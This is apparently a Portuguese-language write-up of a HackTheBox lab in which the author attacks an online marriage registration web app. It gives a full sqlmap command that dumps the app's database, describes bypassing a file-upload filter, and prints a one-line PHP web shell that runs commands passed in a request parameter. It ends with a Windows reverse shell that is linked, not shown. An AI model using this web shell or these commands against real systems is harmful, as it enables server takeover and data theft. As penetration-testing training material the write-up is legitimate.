HTB - Write Up - File Upload com Shell Reversa (WS03)
SQL Injection
Durante a enumeração da rede remota 172.16.1.x, identifiquei a aplicação OMRS - Online Marriage Registration System. Ao pesquisar sobre essa aplicação encontrei o exploit 49307 para explorar a falha de SQL Injection no campo searchdata.
Usando a ferramenta SQLMap foi possível fazer o dump da base de dados, conforme mostram as imagens abaixo:
sqlmap -r request -dbms=mysql -D omrsdb --level 5 --risk 3 --random-agent --proxy=http://127.0.0.1:8080 --threads=10 --dump
File Upload and Directory Listing to Reverse Shell
Na enumeração da aplicação OMRS, identifiquei a listagem de diretório habilitada no path /usr/images. A aplicação é vulnerável a RCE - Remote Code Execution conforme o exploit 49557 publicado no Exploit DB.
A execução do script do exploit não funcionou e a exploração foi realizada manualmente através da requisição interceptada pelo Burp Suite.
Web Shell
Ao interceptar a requisição para o cadastro no recurso marriage-reg-form.php, o código da Web Shell foi inserido como o conteúdo do arquivo, o nome do arquivo alterado para a extensão .php e o content-type modificado para application/x-php.
Código da Web Shell
<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>
O arquivo é salvo no diretório /user/images e a execução da Web Shell ocorre ao acessar o arquivo com o parâmetro ?cmd= para execução de comandos.
Reverse Shell
No caso da conexão reversa, encontrei um código específico para shell reversa em servidores Windows. O github do código pode ser acessado AQUI Foi necessário alterar o local para acesso do arquivo da shell reversa, que no caso deste laboratório é C:\\Apache24\\htdocs\\user\\images
Depois que a requisição é enviada, o acesso ao arquivo da shell é feito e a conexão estabelecida com a máquina DANTE-WS03
O próximo passo é iniciar a enumeração interna deste servidor e realizar a escalação de privilégio.
Continua...
Referências:
[+] https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/windows
[+] https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/
Comentários
Postar um comentário